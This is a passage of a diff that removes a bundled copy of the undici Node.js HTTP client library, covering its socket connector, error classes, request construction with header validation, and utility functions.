InvalidArgumentError('maxCachedSessions must be a positive integer or zero') - } - - const options = { path: socketPath, ...opts } - const sessionCache = new SessionCache(maxCachedSessions == null ? 
100 : maxCachedSessions) - timeout = timeout == null ? 10e3 : timeout - allowH2 = allowH2 != null ? allowH2 : false - return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { - let socket - if (protocol === 'https:') { - if (!tls) { - tls = __nccwpck_require__(4404) - } - servername = servername || options.servername || util.getServerName(host) || null - - const sessionKey = servername || hostname - const session = sessionCache.get(sessionKey) || null - - assert(sessionKey) - - socket = tls.connect({ - highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... - ...options, - servername, - session, - localAddress, - // TODO(HTTP/2): Add support for h2c - ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], - socket: httpSocket, // upgrade socket connection - port: port || 443, - host: hostname - }) - - socket - .on('session', function (session) { - // TODO (fix): Can a session become invalid once established? Don't think so? - sessionCache.set(sessionKey, session) - }) - } else { - assert(!httpSocket, 'httpSocket can only be sent on TLS update') - socket = net.connect({ - highWaterMark: 64 * 1024, // Same as nodejs fs streams. - ...options, - localAddress, - port: port || 80, - host: hostname - }) - } - - // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket - if (options.keepAlive == null || options.keepAlive) { - const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay - socket.setKeepAlive(true, keepAliveInitialDelay) - } - - const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) - - socket - .setNoDelay(true) - .once(protocol === 'https:' ? 
'secureConnect' : 'connect', function () { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(null, this) - } - }) - .on('error', function (err) { - cancelTimeout() - - if (callback) { - const cb = callback - callback = null - cb(err) - } - }) - - return socket - } -} - -function setupTimeout (onConnectTimeout, timeout) { - if (!timeout) { - return () => {} - } - - let s1 = null - let s2 = null - const timeoutId = setTimeout(() => { - // setImmediate is added to make sure that we priotorise socket error events over timeouts - s1 = setImmediate(() => { - if (process.platform === 'win32') { - // Windows needs an extra setImmediate probably due to implementation differences in the socket logic - s2 = setImmediate(() => onConnectTimeout()) - } else { - onConnectTimeout() - } - }) - }, timeout) - return () => { - clearTimeout(timeoutId) - clearImmediate(s1) - clearImmediate(s2) - } -} - -function onConnectTimeout (socket) { - util.destroy(socket, new ConnectTimeoutError()) -} - -module.exports = buildConnector - - -/***/ }), - -/***/ 8045: -/***/ ((module) => { - -"use strict"; - - -class UndiciError extends Error { - constructor (message) { - super(message) - this.name = 'UndiciError' - this.code = 'UND_ERR' - } -} - -class ConnectTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ConnectTimeoutError) - this.name = 'ConnectTimeoutError' - this.message = message || 'Connect Timeout Error' - this.code = 'UND_ERR_CONNECT_TIMEOUT' - } -} - -class HeadersTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersTimeoutError) - this.name = 'HeadersTimeoutError' - this.message = message || 'Headers Timeout Error' - this.code = 'UND_ERR_HEADERS_TIMEOUT' - } -} - -class HeadersOverflowError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, HeadersOverflowError) - this.name = 
'HeadersOverflowError' - this.message = message || 'Headers Overflow Error' - this.code = 'UND_ERR_HEADERS_OVERFLOW' - } -} - -class BodyTimeoutError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, BodyTimeoutError) - this.name = 'BodyTimeoutError' - this.message = message || 'Body Timeout Error' - this.code = 'UND_ERR_BODY_TIMEOUT' - } -} - -class ResponseStatusCodeError extends UndiciError { - constructor (message, statusCode, headers, body) { - super(message) - Error.captureStackTrace(this, ResponseStatusCodeError) - this.name = 'ResponseStatusCodeError' - this.message = message || 'Response Status Code Error' - this.code = 'UND_ERR_RESPONSE_STATUS_CODE' - this.body = body - this.status = statusCode - this.statusCode = statusCode - this.headers = headers - } -} - -class InvalidArgumentError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidArgumentError) - this.name = 'InvalidArgumentError' - this.message = message || 'Invalid Argument Error' - this.code = 'UND_ERR_INVALID_ARG' - } -} - -class InvalidReturnValueError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InvalidReturnValueError) - this.name = 'InvalidReturnValueError' - this.message = message || 'Invalid Return Value Error' - this.code = 'UND_ERR_INVALID_RETURN_VALUE' - } -} - -class RequestAbortedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, RequestAbortedError) - this.name = 'AbortError' - this.message = message || 'Request aborted' - this.code = 'UND_ERR_ABORTED' - } -} - -class InformationalError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, InformationalError) - this.name = 'InformationalError' - this.message = message || 'Request information' - this.code = 'UND_ERR_INFO' - } -} - -class RequestContentLengthMismatchError extends UndiciError { 
- constructor (message) { - super(message) - Error.captureStackTrace(this, RequestContentLengthMismatchError) - this.name = 'RequestContentLengthMismatchError' - this.message = message || 'Request body length does not match content-length header' - this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' - } -} - -class ResponseContentLengthMismatchError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseContentLengthMismatchError) - this.name = 'ResponseContentLengthMismatchError' - this.message = message || 'Response body length does not match content-length header' - this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' - } -} - -class ClientDestroyedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientDestroyedError) - this.name = 'ClientDestroyedError' - this.message = message || 'The client is destroyed' - this.code = 'UND_ERR_DESTROYED' - } -} - -class ClientClosedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ClientClosedError) - this.name = 'ClientClosedError' - this.message = message || 'The client is closed' - this.code = 'UND_ERR_CLOSED' - } -} - -class SocketError extends UndiciError { - constructor (message, socket) { - super(message) - Error.captureStackTrace(this, SocketError) - this.name = 'SocketError' - this.message = message || 'Socket error' - this.code = 'UND_ERR_SOCKET' - this.socket = socket - } -} - -class NotSupportedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'NotSupportedError' - this.message = message || 'Not supported error' - this.code = 'UND_ERR_NOT_SUPPORTED' - } -} - -class BalancedPoolMissingUpstreamError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, NotSupportedError) - this.name = 'MissingUpstreamError' - this.message = message || 'No 
upstream has been added to the BalancedPool' - this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' - } -} - -class HTTPParserError extends Error { - constructor (message, code, data) { - super(message) - Error.captureStackTrace(this, HTTPParserError) - this.name = 'HTTPParserError' - this.code = code ? `HPE_${code}` : undefined - this.data = data ? data.toString() : undefined - } -} - -class ResponseExceededMaxSizeError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, ResponseExceededMaxSizeError) - this.name = 'ResponseExceededMaxSizeError' - this.message = message || 'Response content exceeded max size' - this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' - } -} - -class RequestRetryError extends UndiciError { - constructor (message, code, { headers, data }) { - super(message) - Error.captureStackTrace(this, RequestRetryError) - this.name = 'RequestRetryError' - this.message = message || 'Request retry error' - this.code = 'UND_ERR_REQ_RETRY' - this.statusCode = code - this.data = data - this.headers = headers - } -} - -module.exports = { - HTTPParserError, - UndiciError, - HeadersTimeoutError, - HeadersOverflowError, - BodyTimeoutError, - RequestContentLengthMismatchError, - ConnectTimeoutError, - ResponseStatusCodeError, - InvalidArgumentError, - InvalidReturnValueError, - RequestAbortedError, - ClientDestroyedError, - ClientClosedError, - InformationalError, - SocketError, - NotSupportedError, - ResponseContentLengthMismatchError, - BalancedPoolMissingUpstreamError, - ResponseExceededMaxSizeError, - RequestRetryError -} - - -/***/ }), - -/***/ 2905: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - InvalidArgumentError, - NotSupportedError -} = __nccwpck_require__(8045) -const assert = __nccwpck_require__(9491) -const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) -const util = __nccwpck_require__(3983) - -// tokenRegExp and 
headerCharRegex have been lifted from -// https://github.com/nodejs/node/blob/main/lib/_http_common.js - -/** - * Verifies that the given val is a valid HTTP token - * per the rules defined in RFC 7230 - * See https://tools.ietf.org/html/rfc7230#section-3.2.6 - */ -const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ - -/** - * Matches if val contains an invalid field-vchar - * field-value = *( field-content / obs-fold ) - * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] - * field-vchar = VCHAR / obs-text - */ -const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ - -// Verifies that a given path is valid does not contain control chars \x00 to \x20 -const invalidPathRegex = /[^\u0021-\u00ff]/ - -const kHandler = Symbol('handler') - -const channels = {} - -let extractBody - -try { - const diagnosticsChannel = __nccwpck_require__(7643) - channels.create = diagnosticsChannel.channel('undici:request:create') - channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') - channels.headers = diagnosticsChannel.channel('undici:request:headers') - channels.trailers = diagnosticsChannel.channel('undici:request:trailers') - channels.error = diagnosticsChannel.channel('undici:request:error') -} catch { - channels.create = { hasSubscribers: false } - channels.bodySent = { hasSubscribers: false } - channels.headers = { hasSubscribers: false } - channels.trailers = { hasSubscribers: false } - channels.error = { hasSubscribers: false } -} - -class Request { - constructor (origin, { - path, - method, - body, - headers, - query, - idempotent, - blocking, - upgrade, - headersTimeout, - bodyTimeout, - reset, - throwOnError, - expectContinue - }, handler) { - if (typeof path !== 'string') { - throw new InvalidArgumentError('path must be a string') - } else if ( - path[0] !== '/' && - !(path.startsWith('http://') || path.startsWith('https://')) && - method !== 'CONNECT' - ) { - throw new InvalidArgumentError('path must be an absolute URL or start with a slash') 
- } else if (invalidPathRegex.exec(path) !== null) { - throw new InvalidArgumentError('invalid request path') - } - - if (typeof method !== 'string') { - throw new InvalidArgumentError('method must be a string') - } else if (tokenRegExp.exec(method) === null) { - throw new InvalidArgumentError('invalid request method') - } - - if (upgrade && typeof upgrade !== 'string') { - throw new InvalidArgumentError('upgrade must be a string') - } - - if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { - throw new InvalidArgumentError('invalid headersTimeout') - } - - if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { - throw new InvalidArgumentError('invalid bodyTimeout') - } - - if (reset != null && typeof reset !== 'boolean') { - throw new InvalidArgumentError('invalid reset') - } - - if (expectContinue != null && typeof expectContinue !== 'boolean') { - throw new InvalidArgumentError('invalid expectContinue') - } - - this.headersTimeout = headersTimeout - - this.bodyTimeout = bodyTimeout - - this.throwOnError = throwOnError === true - - this.method = method - - this.abort = null - - if (body == null) { - this.body = null - } else if (util.isStream(body)) { - this.body = body - - const rState = this.body._readableState - if (!rState || !rState.autoDestroy) { - this.endHandler = function autoDestroy () { - util.destroy(this) - } - this.body.on('end', this.endHandler) - } - - this.errorHandler = err => { - if (this.abort) { - this.abort(err) - } else { - this.error = err - } - } - this.body.on('error', this.errorHandler) - } else if (util.isBuffer(body)) { - this.body = body.byteLength ? body : null - } else if (ArrayBuffer.isView(body)) { - this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null - } else if (body instanceof ArrayBuffer) { - this.body = body.byteLength ? Buffer.from(body) : null - } else if (typeof body === 'string') { - this.body = body.length ? 
Buffer.from(body) : null - } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { - this.body = body - } else { - throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') - } - - this.completed = false - - this.aborted = false - - this.upgrade = upgrade || null - - this.path = query ? util.buildURL(path, query) : path - - this.origin = origin - - this.idempotent = idempotent == null - ? method === 'HEAD' || method === 'GET' - : idempotent - - this.blocking = blocking == null ? false : blocking - - this.reset = reset == null ? null : reset - - this.host = null - - this.contentLength = null - - this.contentType = null - - this.headers = '' - - // Only for H2 - this.expectContinue = expectContinue != null ? expectContinue : false - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(this, headers[i], headers[i + 1]) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(this, key, headers[key]) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - if (util.isFormDataLike(this.body)) { - if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { - throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') - } - - if (!extractBody) { - extractBody = (__nccwpck_require__(1472).extractBody) - } - - const [bodyStream, contentType] = extractBody(body) - if (this.contentType == null) { - this.contentType = contentType - this.headers += `content-type: ${contentType}\r\n` - } - this.body = bodyStream.stream - this.contentLength = bodyStream.length - } else if (util.isBlobLike(body) && this.contentType == 
null && body.type) { - this.contentType = body.type - this.headers += `content-type: ${body.type}\r\n` - } - - util.validateHandler(handler, method, upgrade) - - this.servername = util.getServerName(this.host) - - this[kHandler] = handler - - if (channels.create.hasSubscribers) { - channels.create.publish({ request: this }) - } - } - - onBodySent (chunk) { - if (this[kHandler].onBodySent) { - try { - return this[kHandler].onBodySent(chunk) - } catch (err) { - this.abort(err) - } - } - } - - onRequestSent () { - if (channels.bodySent.hasSubscribers) { - channels.bodySent.publish({ request: this }) - } - - if (this[kHandler].onRequestSent) { - try { - return this[kHandler].onRequestSent() - } catch (err) { - this.abort(err) - } - } - } - - onConnect (abort) { - assert(!this.aborted) - assert(!this.completed) - - if (this.error) { - abort(this.error) - } else { - this.abort = abort - return this[kHandler].onConnect(abort) - } - } - - onHeaders (statusCode, headers, resume, statusText) { - assert(!this.aborted) - assert(!this.completed) - - if (channels.headers.hasSubscribers) { - channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) - } - - try { - return this[kHandler].onHeaders(statusCode, headers, resume, statusText) - } catch (err) { - this.abort(err) - } - } - - onData (chunk) { - assert(!this.aborted) - assert(!this.completed) - - try { - return this[kHandler].onData(chunk) - } catch (err) { - this.abort(err) - return false - } - } - - onUpgrade (statusCode, headers, socket) { - assert(!this.aborted) - assert(!this.completed) - - return this[kHandler].onUpgrade(statusCode, headers, socket) - } - - onComplete (trailers) { - this.onFinally() - - assert(!this.aborted) - - this.completed = true - if (channels.trailers.hasSubscribers) { - channels.trailers.publish({ request: this, trailers }) - } - - try { - return this[kHandler].onComplete(trailers) - } catch (err) { - // TODO (fix): This might be a bad idea? 
- this.onError(err) - } - } - - onError (error) { - this.onFinally() - - if (channels.error.hasSubscribers) { - channels.error.publish({ request: this, error }) - } - - if (this.aborted) { - return - } - this.aborted = true - - return this[kHandler].onError(error) - } - - onFinally () { - if (this.errorHandler) { - this.body.off('error', this.errorHandler) - this.errorHandler = null - } - - if (this.endHandler) { - this.body.off('end', this.endHandler) - this.endHandler = null - } - } - - // TODO: adjust to support H2 - addHeader (key, value) { - processHeader(this, key, value) - return this - } - - static [kHTTP1BuildRequest] (origin, opts, handler) { - // TODO: Migrate header parsing here, to make Requests - // HTTP agnostic - return new Request(origin, opts, handler) - } - - static [kHTTP2BuildRequest] (origin, opts, handler) { - const headers = opts.headers - opts = { ...opts, headers: null } - - const request = new Request(origin, opts, handler) - - request.headers = {} - - if (Array.isArray(headers)) { - if (headers.length % 2 !== 0) { - throw new InvalidArgumentError('headers array must be even') - } - for (let i = 0; i < headers.length; i += 2) { - processHeader(request, headers[i], headers[i + 1], true) - } - } else if (headers && typeof headers === 'object') { - const keys = Object.keys(headers) - for (let i = 0; i < keys.length; i++) { - const key = keys[i] - processHeader(request, key, headers[key], true) - } - } else if (headers != null) { - throw new InvalidArgumentError('headers must be an object or an array') - } - - return request - } - - static [kHTTP2CopyHeaders] (raw) { - const rawHeaders = raw.split('\r\n') - const headers = {} - - for (const header of rawHeaders) { - const [key, value] = header.split(': ') - - if (value == null || value.length === 0) continue - - if (headers[key]) headers[key] += `,${value}` - else headers[key] = value - } - - return headers - } -} - -function processHeaderValue (key, val, skipAppend) { - if (val && typeof val 
=== 'object') { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - val = val != null ? `${val}` : '' - - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - - return skipAppend ? val : `${key}: ${val}\r\n` -} - -function processHeader (request, key, val, skipAppend = false) { - if (val && (typeof val === 'object' && !Array.isArray(val))) { - throw new InvalidArgumentError(`invalid ${key} header`) - } else if (val === undefined) { - return - } - - if ( - request.host === null && - key.length === 4 && - key.toLowerCase() === 'host' - ) { - if (headerCharRegex.exec(val) !== null) { - throw new InvalidArgumentError(`invalid ${key} header`) - } - // Consumed by Client - request.host = val - } else if ( - request.contentLength === null && - key.length === 14 && - key.toLowerCase() === 'content-length' - ) { - request.contentLength = parseInt(val, 10) - if (!Number.isFinite(request.contentLength)) { - throw new InvalidArgumentError('invalid content-length header') - } - } else if ( - request.contentType === null && - key.length === 12 && - key.toLowerCase() === 'content-type' - ) { - request.contentType = val - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } else if ( - key.length === 17 && - key.toLowerCase() === 'transfer-encoding' - ) { - throw new InvalidArgumentError('invalid transfer-encoding header') - } else if ( - key.length === 10 && - key.toLowerCase() === 'connection' - ) { - const value = typeof val === 'string' ? 
val.toLowerCase() : null - if (value !== 'close' && value !== 'keep-alive') { - throw new InvalidArgumentError('invalid connection header') - } else if (value === 'close') { - request.reset = true - } - } else if ( - key.length === 10 && - key.toLowerCase() === 'keep-alive' - ) { - throw new InvalidArgumentError('invalid keep-alive header') - } else if ( - key.length === 7 && - key.toLowerCase() === 'upgrade' - ) { - throw new InvalidArgumentError('invalid upgrade header') - } else if ( - key.length === 6 && - key.toLowerCase() === 'expect' - ) { - throw new NotSupportedError('expect header not supported') - } else if (tokenRegExp.exec(key) === null) { - throw new InvalidArgumentError('invalid header key') - } else { - if (Array.isArray(val)) { - for (let i = 0; i < val.length; i++) { - if (skipAppend) { - if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` - else request.headers[key] = processHeaderValue(key, val[i], skipAppend) - } else { - request.headers += processHeaderValue(key, val[i]) - } - } - } else { - if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) - else request.headers += processHeaderValue(key, val) - } - } -} - -module.exports = Request - - -/***/ }), - -/***/ 2785: -/***/ ((module) => { - -module.exports = { - kClose: Symbol('close'), - kDestroy: Symbol('destroy'), - kDispatch: Symbol('dispatch'), - kUrl: Symbol('url'), - kWriting: Symbol('writing'), - kResuming: Symbol('resuming'), - kQueue: Symbol('queue'), - kConnect: Symbol('connect'), - kConnecting: Symbol('connecting'), - kHeadersList: Symbol('headers list'), - kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), - kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), - kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), - kKeepAliveTimeoutValue: Symbol('keep alive timeout'), - kKeepAlive: Symbol('keep alive'), - kHeadersTimeout: Symbol('headers timeout'), - kBodyTimeout: Symbol('body 
timeout'), - kServerName: Symbol('server name'), - kLocalAddress: Symbol('local address'), - kHost: Symbol('host'), - kNoRef: Symbol('no ref'), - kBodyUsed: Symbol('used'), - kRunning: Symbol('running'), - kBlocking: Symbol('blocking'), - kPending: Symbol('pending'), - kSize: Symbol('size'), - kBusy: Symbol('busy'), - kQueued: Symbol('queued'), - kFree: Symbol('free'), - kConnected: Symbol('connected'), - kClosed: Symbol('closed'), - kNeedDrain: Symbol('need drain'), - kReset: Symbol('reset'), - kDestroyed: Symbol.for('nodejs.stream.destroyed'), - kMaxHeadersSize: Symbol('max headers size'), - kRunningIdx: Symbol('running index'), - kPendingIdx: Symbol('pending index'), - kError: Symbol('error'), - kClients: Symbol('clients'), - kClient: Symbol('client'), - kParser: Symbol('parser'), - kOnDestroyed: Symbol('destroy callbacks'), - kPipelining: Symbol('pipelining'), - kSocket: Symbol('socket'), - kHostHeader: Symbol('host header'), - kConnector: Symbol('connector'), - kStrictContentLength: Symbol('strict content length'), - kMaxRedirections: Symbol('maxRedirections'), - kMaxRequests: Symbol('maxRequestsPerClient'), - kProxy: Symbol('proxy agent options'), - kCounter: Symbol('socket request counter'), - kInterceptors: Symbol('dispatch interceptors'), - kMaxResponseSize: Symbol('max response size'), - kHTTP2Session: Symbol('http2Session'), - kHTTP2SessionState: Symbol('http2Session state'), - kHTTP2BuildRequest: Symbol('http2 build request'), - kHTTP1BuildRequest: Symbol('http1 build request'), - kHTTP2CopyHeaders: Symbol('http2 copy headers'), - kHTTPConnVersion: Symbol('http connection version'), - kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), - kConstruct: Symbol('constructable') -} - - -/***/ }), - -/***/ 3983: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const assert = __nccwpck_require__(9491) -const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) -const { IncomingMessage } = 
__nccwpck_require__(3685) -const stream = __nccwpck_require__(2781) -const net = __nccwpck_require__(1808) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { Blob } = __nccwpck_require__(4300) -const nodeUtil = __nccwpck_require__(3837) -const { stringify } = __nccwpck_require__(3477) - -const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) - -function nop () {} - -function isStream (obj) { - return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' -} - -// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) -function isBlobLike (object) { - return (Blob && object instanceof Blob) || ( - object && - typeof object === 'object' && - (typeof object.stream === 'function' || - typeof object.arrayBuffer === 'function') && - /^(Blob|File)$/.test(object[Symbol.toStringTag]) - ) -} - -function buildURL (url, queryParams) { - if (url.includes('?') || url.includes('#')) { - throw new Error('Query params cannot be passed when url already contains "?" or "#".') - } - - const stringified = stringify(queryParams) - - if (stringified) { - url += '?' 
+ stringified - } - - return url -} - -function parseURL (url) { - if (typeof url === 'string') { - url = new URL(url) - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - return url - } - - if (!url || typeof url !== 'object') { - throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') - } - - if (!/^https?:/.test(url.origin || url.protocol)) { - throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') - } - - if (!(url instanceof URL)) { - if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { - throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') - } - - if (url.path != null && typeof url.path !== 'string') { - throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') - } - - if (url.pathname != null && typeof url.pathname !== 'string') { - throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') - } - - if (url.hostname != null && typeof url.hostname !== 'string') { - throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') - } - - if (url.origin != null && typeof url.origin !== 'string') { - throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') - } - - const port = url.port != null - ? url.port - : (url.protocol === 'https:' ? 443 : 80) - let origin = url.origin != null - ? url.origin - : `${url.protocol}//${url.hostname}:${port}` - let path = url.path != null - ? 
url.path - : `${url.pathname || ''}${url.search || ''}` - - if (origin.endsWith('/')) { - origin = origin.substring(0, origin.length - 1) - } - - if (path && !path.startsWith('/')) { - path = `/${path}` - } - // new URL(path, origin) is unsafe when `path` contains an absolute URL - // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: - // If first parameter is a relative URL, second param is required, and will be used as the base URL. - // If first parameter is an absolute URL, a given second param will be ignored. - url = new URL(origin + path) - } - - return url -} - -function parseOrigin (url) { - url = parseURL(url) - - if (url.pathname !== '/' || url.search || url.hash) { - throw new InvalidArgumentError('invalid url') - } - - return url -} - -function getHostname (host) { - if (host[0] === '[') { - const idx = host.indexOf(']') - - assert(idx !== -1) - return host.substring(1, idx) - } - - const idx = host.indexOf(':') - if (idx === -1) return host - - return host.substring(0, idx) -} - -// IP addresses are not valid server names per RFC6066 -// > Currently, the only server names supported are DNS hostnames -function getServerName (host) { - if (!host) { - return null - } - - assert.strictEqual(typeof host, 'string') - - const servername = getHostname(host) - if (net.isIP(servername)) { - return '' - } - - return servername -} - -function deepClone (obj) { - return JSON.parse(JSON.stringify(obj)) -} - -function isAsyncIterable (obj) { - return !!(obj != null && typeof obj[Symbol.asyncIterator] === 'function') -} - -function isIterable (obj) { - return !!(obj != null && (typeof obj[Symbol.iterator] === 'function' || typeof obj[Symbol.asyncIterator] === 'function')) -} - -function bodyLength (body) { - if (body == null) { - return 0 - } else if (isStream(body)) { - const state = body._readableState - return state && state.objectMode === false && state.ended === true && Number.isFinite(state.length) - ? 
state.length - : null - } else if (isBlobLike(body)) { - return body.size != null ? body.size : null - } else if (isBuffer(body)) { - return body.byteLength - } - - return null -} - -function isDestroyed (stream) { - return !stream || !!(stream.destroyed || stream[kDestroyed]) -} - -function isReadableAborted (stream) { - const state = stream && stream._readableState - return isDestroyed(stream) && state && !state.endEmitted -} - -function destroy (stream, err) { - if (stream == null || !isStream(stream) || isDestroyed(stream)) { - return - } - - if (typeof stream.destroy === 'function') { - if (Object.getPrototypeOf(stream).constructor === IncomingMessage) { - // See: https://github.com/nodejs/node/pull/38505/files - stream.socket = null - } - - stream.destroy(err) - } else if (err) { - process.nextTick((stream, err) => { - stream.emit('error', err) - }, stream, err) - } - - if (stream.destroyed !== true) { - stream[kDestroyed] = true - } -} - -const KEEPALIVE_TIMEOUT_EXPR = /timeout=(\d+)/ -function parseKeepAliveTimeout (val) { - const m = val.toString().match(KEEPALIVE_TIMEOUT_EXPR) - return m ? 
parseInt(m[1], 10) * 1000 : null -} - -function parseHeaders (headers, obj = {}) { - // For H2 support - if (!Array.isArray(headers)) return headers - - for (let i = 0; i < headers.length; i += 2) { - const key = headers[i].toString().toLowerCase() - let val = obj[key] - - if (!val) { - if (Array.isArray(headers[i + 1])) { - obj[key] = headers[i + 1].map(x => x.toString('utf8')) - } else { - obj[key] = headers[i + 1].toString('utf8') - } - } else { - if (!Array.isArray(val)) { - val = [val] - obj[key] = val - } - val.push(headers[i + 1].toString('utf8')) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if ('content-length' in obj && 'content-disposition' in obj) { - obj['content-disposition'] = Buffer.from(obj['content-disposition']).toString('latin1') - } - - return obj -} - -function parseRawHeaders (headers) { - const ret = [] - let hasContentLength = false - let contentDispositionIdx = -1 - - for (let n = 0; n < headers.length; n += 2) { - const key = headers[n + 0].toString() - const val = headers[n + 1].toString('utf8') - - if (key.length === 14 && (key === 'content-length' || key.toLowerCase() === 'content-length')) { - ret.push(key, val) - hasContentLength = true - } else if (key.length === 19 && (key === 'content-disposition' || key.toLowerCase() === 'content-disposition')) { - contentDispositionIdx = ret.push(key, val) - 1 - } else { - ret.push(key, val) - } - } - - // See https://github.com/nodejs/node/pull/46528 - if (hasContentLength && contentDispositionIdx !== -1) { - ret[contentDispositionIdx] = Buffer.from(ret[contentDispositionIdx]).toString('latin1') - } - - return ret -} - -function isBuffer (buffer) { - // See, https://github.com/mcollina/undici/pull/319 - return buffer instanceof Uint8Array || Buffer.isBuffer(buffer) -} - -function validateHandler (handler, method, upgrade) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - if (typeof handler.onConnect !== 
'function') { - throw new InvalidArgumentError('invalid onConnect method') - } - - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { - throw new InvalidArgumentError('invalid onBodySent method') - } - - if (upgrade || method === 'CONNECT') { - if (typeof handler.onUpgrade !== 'function') { - throw new InvalidArgumentError('invalid onUpgrade method') - } - } else { - if (typeof handler.onHeaders !== 'function') { - throw new InvalidArgumentError('invalid onHeaders method') - } - - if (typeof handler.onData !== 'function') { - throw new InvalidArgumentError('invalid onData method') - } - - if (typeof handler.onComplete !== 'function') { - throw new InvalidArgumentError('invalid onComplete method') - } - } -} - -// A body is disturbed if it has been read from and it cannot -// be re-used without losing state or data. -function isDisturbed (body) { - return !!(body && ( - stream.isDisturbed - ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? - : body[kBodyUsed] || - body.readableDidRead || - (body._readableState && body._readableState.dataEmitted) || - isReadableAborted(body) - )) -} - -function isErrored (body) { - return !!(body && ( - stream.isErrored - ? stream.isErrored(body) - : /state: 'errored'/.test(nodeUtil.inspect(body) - ))) -} - -function isReadable (body) { - return !!(body && ( - stream.isReadable - ? 
